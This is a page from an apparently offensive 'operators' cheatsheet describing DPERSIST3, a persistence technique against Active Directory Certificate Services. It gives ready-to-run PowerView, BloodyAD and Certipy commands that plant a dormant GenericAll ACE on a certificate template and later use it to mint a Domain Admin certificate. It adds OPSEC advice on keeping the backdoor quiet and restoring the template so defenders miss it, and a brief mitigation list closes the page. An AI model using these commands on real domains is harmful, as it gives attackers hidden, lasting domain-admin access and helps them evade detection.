daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

dpersist3-malicious-misconfiguration-acl-backdoor.md (4495B)


      1 ---
      2 title: "DPERSIST3 — Malicious Misconfiguration (ACL Backdoor)"
      3 description: "Instead of forging certs now, DPERSIST3 backdoors the PKI ACLs so you can re-escalate whenever you like. You grant an attacker-controlled principal…"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs", "delegation", "privilege-escalation", "persistence"]
      7 tools: ["Certipy", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/DPERSIST3 — Malicious Misconfiguration (ACL Backdoor).md"
     11 ---
     12 # DPERSIST3 — Malicious Misconfiguration (ACL Backdoor)
     13 
     14 ## Quick Reference
     15 
     16 | Field | Value |
     17 |-------|-------|
     18 | **Category** | Domain Persistence (ACL) |
     19 | **Difficulty** | Medium–High |
     20 | **Pre-requisites** | Write/Owner over PKI AD objects (CA object, templates, Enrollment Services, NTAuth) — typically post-DA |
     21 | **Tools** | PowerView, BloodyAD, Certipy, dacledit |
     22 | **OPSEC Noise** | Low after the fact — a dormant ACE that looks like normal delegation |
     23 | **One-liner** | Plant permissive ACEs on ADCS objects so a principal you control can re-create an ESC condition on demand, giving quiet, reusable domain persistence. |
     24 
     25 ***
     26 
     27 ## What Is DPERSIST3?
     28 
     29 Instead of forging certs now, DPERSIST3 **backdoors the PKI ACLs** so you can re-escalate whenever you like. You grant an attacker-controlled principal write/control over a template, the CA object, the Enrollment Services container, or `NTAuthCertificates`. Later, from any low-priv-looking account, you flip a template into an ESC4/ESC1 state (or push a rogue CA per DPERSIST2) and mint privileged certs. The backdoor is a single dormant ACE that blends into legitimate delegation.
     30 
     31 ***
     32 
     33 ## Step 1 — Identify the Object to Backdoor
     34 
     35 ```bash
     36 # Enumerate PKI objects + current DACLs
     37 certipy-ad find -u admin -p pass -dc-ip $TARGET -stdout
     38 ```
     39 
     40 Good targets (in `CN=Public Key Services,CN=Services,CN=Configuration,DC=...`):
     41 
     42 | Object | Backdoor effect |
     43 | :-- | :-- |
     44 | A certificate template | Grant Write → recreate ESC1/ESC4 on demand |
     45 | `CN=Certificate Templates` container | Create/clone new vulnerable templates |
     46 | The Enterprise CA object | Grant ManageCA → ESC7-style control |
     47 | `NTAuthCertificates` | Grant Write → publish rogue CA (DPERSIST2) |
     48 
     49 ***
     50 
     51 ## Step 2 — Plant the ACE
     52 
     53 ```powershell
     54 # PowerView — give a controlled user GenericAll over a template
     55 Add-DomainObjectAcl -TargetIdentity "CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=htb" `
     56   -PrincipalIdentity 'lowpriv' -Rights All
     57 ```
     58 
     59 ```bash
     60 # BloodyAD equivalent
     61 bloodyAD -u admin -p pass -d domain.htb --host $TARGET \
     62   add genericAll 'CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=htb' lowpriv
     63 ```
     64 
     65 ***
     66 
     67 ## Step 3 — Re-Escalate On Demand (later)
     68 
     69 ```bash
     70 # From the backdoored low-priv account, flip the template to ESC1 and request a DA cert
     71 certipy-ad template -u lowpriv -p pass -template User -write-default-configuration ...  # make it vulnerable
     72 certipy-ad req -u lowpriv -p pass -ca 'DOMAIN-CA' -template User -upn administrator@domain.htb
     73 certipy-ad auth -pfx administrator.pfx -dc-ip $TARGET
     74 ```
     75 
     76 > [!tip] Pair with template restore
     77 > Some operators flip the template vulnerable, request, then restore the original config to minimise the window a defender could catch it in a config diff.
     78 
     79 ***
     80 
     81 ## OPSEC Considerations
     82 
     83 | Action | Log | Noise |
     84 | :-- | :-- | :-- |
     85 | Planting the ACE | AD object write (4662/5136) | 🟡 Medium (at plant time) |
     86 | Dormant backdoor | none | 🟢 Low |
     87 | On-demand re-escalation | template change + 4886/4887 | 🟡 Medium |
     88 
     89 ***
     90 
     91 ## Mitigation
     92 
     93 - Baseline and monitor DACLs on **all** PKI objects; alert on new write/control ACEs.
     94 - Restrict who can modify templates and the Enrollment Services / NTAuth containers.
     95 - Use SACLs (Event 4662/5136) on the PKI config container to catch ACE additions.
     96 - After a DA-level incident, audit ADCS ACLs for planted backdoors, not just user/group membership.
     97 
     98 ***
     99 
    100 ## See Also
    101 
    102 - _ADCS Attack Methodology Guide · ESC4 — Vulnerable Certificate Template Access Control · ESC5 — Vulnerable PKI Object Access Control · ESC7 — Vulnerable CA Access Control (ManageCA  ManageCertificates) · DPERSIST2 — Rogue CA Certificate (NTAuth Injection)
    103 - Sources: SpecterOps *Certified Pre-Owned*; [The Hacker Recipes — ADCS](https://www.thehacker.recipes/ad/movement/ad-cs/)